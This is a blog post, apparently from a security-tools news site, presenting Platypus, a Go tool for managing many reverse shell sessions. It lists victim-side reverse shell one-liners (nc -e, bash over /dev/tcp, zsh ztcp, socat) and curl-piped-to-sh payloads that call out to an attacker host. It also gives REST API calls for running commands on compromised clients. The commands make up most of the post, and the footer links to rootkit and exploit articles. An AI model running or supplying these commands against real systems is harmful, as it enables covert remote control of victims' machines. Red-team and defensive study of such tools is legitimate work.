Platypus : A modern Multiple Reverse Shell Sessions Manager Written In Go

Platypus is a modern multiple reverse shell sessions/clients manager via terminal written in go. It include the following

  • Multiple service listening port
  • Multiple client connections
  • RESTful API
  • Reverse shell as a service

Also Read – W12Scan : A Simple Asset Discovery Engine for Cybersecurity

Network Topology

Attack IP: 192.168.1.2
Reverse Shell Service: 0.0.0.0:8080
RESTful Service: 127.0.0.1:9090
Victim IP: 192.168.1.3

Run Platypus from source code

go get github.com/WangYihang/Platypus
cd go/src/github.com/WangYihang/Platypus
go run platypus.go

Run Platypus from release binaries

// Download binary from https://github.com/WangYihang/Platypus/releases
chmod +x ./Platypus_linux_amd64
./Platypus_linux_amd64

Victim side

nc -e /bin/bash 192.168.1.2 8080
bash -c ‘bash -i >/dev/tcp/192.168.1.2/8080 0>&1’
zsh -c ‘zmodload zsh/net/tcp && ztcp 192.168.1.2 8080 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY’
socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:192.168.1.2:8080

Reverse shell as a Service

// Platypus is able to multiplexing the reverse shell listening port
// The port 8080 can receive reverse shell client connection
// Also these is a Reverse shell as a service running on this port

// victim will be redirected to attacker-host attacker-port
// sh -c “$(curl http://host:port/attacker-host/attacker-port)”
curl http://192.168.1.2:8080/attacker.com/1337
bash -c ‘bash -i >/dev/tcp/attacker.com/1337 0>&1’
sh -c “$(curl http://192.168.1.2:8080/attacker.com/1337)”

// if the attacker info not specified, it will use host, port as attacker-host attacker-port
// sh -c “$(curl http://host:port/)”
curl http://192.168.1.2:8080/
curl http://192.168.1.2:8080/192.168.1.2/8080|sh
sh -c “$(curl http://host:port/)”

RESTful API

GET /client List all online clients

curl ‘http://127.0.0.1:9090/client
{
“msg”: [
“192.168.1.3:54798”
],
“status”: true
}
POST /client/:hash execute a command on a specific client
curl -X POST ‘http://127.0.0.1:9090/client/0723c3bed0d0240140e10a6ffd36eed4’ –data ‘cmd=whoami’
{
“status”: true,
“msg”: “root\n”,
}

How to hash?

echo -n “192.168.1.3:54798” | md5sum
0723c3bed0d0240140e10a6ffd36eed4 –

Screenshot

Download
R K

Share
Published by
R K
Tags: GoPlatypusReverse Shell
6 years ago

Recent Posts

Shadow-rs : Harnessing Rust’s Power For Kernel-Level Security Research

shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…

1 week ago

ExecutePeFromPngViaLNK – Advanced Execution Of Embedded PE Files via PNG And LNK

Extract and execute a PE embedded within a PNG file using an LNK file. The…

2 weeks ago

Red Team Certification – A Comprehensive Guide To Advancing In Cybersecurity Operations

Embark on the journey of becoming a certified Red Team professional with our definitive guide.…

3 weeks ago

CVE-2024-5836 / CVE-2024-6778 : Chromium Sandbox Escape via Extension Exploits

This repository contains proof of concept exploits for CVE-2024-5836 and CVE-2024-6778, which are vulnerabilities within…

3 weeks ago

Rust BOFs – Unlocking New Potentials In Cobalt Strike

This took me like 4 days (+2 days for an update), but I got it…

3 weeks ago

MaLDAPtive – Pioneering LDAP SearchFilter Parsing And Security Framework

MaLDAPtive is a framework for LDAP SearchFilter parsing, obfuscation, deobfuscation and detection. Its foundation is…

3 weeks ago